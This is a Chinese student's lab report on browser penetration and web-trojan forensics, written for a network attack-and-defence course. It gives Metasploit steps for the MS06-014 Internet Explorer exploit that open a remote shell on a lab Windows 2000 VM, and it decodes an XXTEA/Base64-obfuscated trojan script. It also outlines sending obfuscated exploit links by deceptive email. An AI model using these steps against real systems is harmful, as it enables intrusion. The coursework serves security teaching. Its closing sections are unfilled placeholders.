20211914涂可新 2021-2022-2 《网络攻防实践》实践十一报告
作者:互联网
20211914涂可新 2021-2022-2 《网络攻防实践》实践十一报告
1.实践内容
总结一下本周学习内容并介绍下实践内容,不要复制粘贴
2.实践过程
2.1web浏览器渗透攻击
任务:使用攻击机和Windows靶机进行浏览器渗透攻击实验,体验网页木马构造及实施浏览器攻击的实际过程。
实验步骤:
①选择使用Metasploit中的MS06-014渗透攻击模块
②选择PAYLOAD为任意远程Shell连接
③设置服务器地址和URL参数,运行exploit,构造出恶意网页木马脚本
④在靶机环境中启动浏览器,验证与服务器的连通性,并访问而已网页木马脚本URL
⑤在攻击机的Metasploit软件中查看渗透攻击状态,并通过成功渗透攻击后建立起的远程控制会话SESSION,在靶机上远程执行命令
本次实践所使用虚拟机网络配置皆设置为桥接模式:
虚拟机 | IP地址 |
---|---|
Kali | 172.30.6.230 |
Win2kServer | 172.30.1.222 |
step1
提权,启动msfconsole。
step2
输入指令:search MS06-014搜索Metasploit中的MS06-014渗透攻击模块。
再输入指令:use exploit/windows/browser/ie_createobject使用MS06-014渗透攻击模块。
step3
输入指令:set Lhost 172.30.6.230配置攻击机IP,输入指令:set Rhost 172.30.1.222配置靶机IP。
输入指令:set payload windows/shell/bind_tcp将PAYLOAD设置为远程Shell连接。
step4
输入指令:exploit构造出恶意网页木马脚本,回车后得到本地地址:http://172.30.6.230:8080/ighKZrcn4。
step5
打开靶机Win2kServer的浏览器,访问step4得到的本地地址http://172.30.6.230:8080/ighKZrcn4,浏览器会返回一串字符串。
step6
回到攻击机kali,发现攻击机和靶机之间已经建立了会话连接。
step7
输入指令:sessions -i 1选择会话,返回shell。
浏览器攻击攻击成功,输入ipconfig,在靶机上远程执行查看Win2kServerIP地址。
2.2取证分析实践—网页木马攻击场景分析
实践步骤:
①首先你应该访问start.html,在这个文件中给出了new09.htm的地址,
②在进入 htm 后,每解密出一个文件地址,请对其作 32 位 MD5 散列,以散列值为文件名到 http://192.168.68.253/scom/hashed/哈希值下去下载对应的文件(注意:文件名中的英文字母为小写,且没有扩展名),即为解密出的地址对应的文件。
③如果解密出的地址给出的是网页或脚本文件,请继续解密。
④如果解密出的地址是二进制程序文件,请进行静态反汇编或动态调试。
⑤重复以上过程直到这些文件被全部分析完成。
step1
从云班课下载网页挂马分析实践参考(上).pdf,打开文件后搜索“new09.htm”,发现有两处。
step2
在new09.htm 的代码中,用 iframe 引用了 http://aa.18dd.net/aa/kl.htm文件,又用 javascript 引用了一个 http://js.users.51.la/1299644.js文件。
step3
对http://aa.18dd.net/aa/kl.htm和http://js.users.51.la/1299644.js进行MD5散列。
step4
step5
这个23180a42a2ff1192150231b44ffdf3d3文件并不是我们需要的内容,7f60672dcd6b5e90b6772545ee219bd3文件才是,这个文件中的代码很复杂,这是因为采用了一种称为XXTEA+Base64的加密方法,为了解决这个问题,学过密码学的我们知道,关键在于找到密码,这个文件中t=utf8to16(xxtea_decrypt(base64decode(t), '\x73\x63\x72\x69\x70\x74'));将\x73\x63\x72\x69\x70\x74使用十六进制转字符串的操作,即可得到密钥script,然后我们对它进行进行XXTEA+Base64解密。
step6
2.3攻防对抗实践—web浏览器渗透攻击攻防
2.3.1攻击方使用Metasploit构造出至少两个不同Web浏览端软件安全漏洞的渗透攻击代码,并进行混淆处理之后组装成一个URL,通过具有欺骗性的电子邮件发送给防守方。
2.3.2防守方对电子邮件中的挂马链接进行提取、解混淆分析、尝试恢复出渗透代码的原始形态,并分析这些渗透代码都是攻击哪些Web浏览端软件的哪些安全漏洞。
3.学习中遇到的问题及解决
- 问题1:XXXXXX
- 问题1解决方案:XXXXXX
- 问题2:XXXXXX
- 问题2解决方案:XXXXXX - ...
4.实践总结
xxx xxx
参考资料
标签:文件,渗透,浏览器,涂可新,实践,攻击,2021,http 来源: https://www.cnblogs.com/tkx1914/p/16325289.html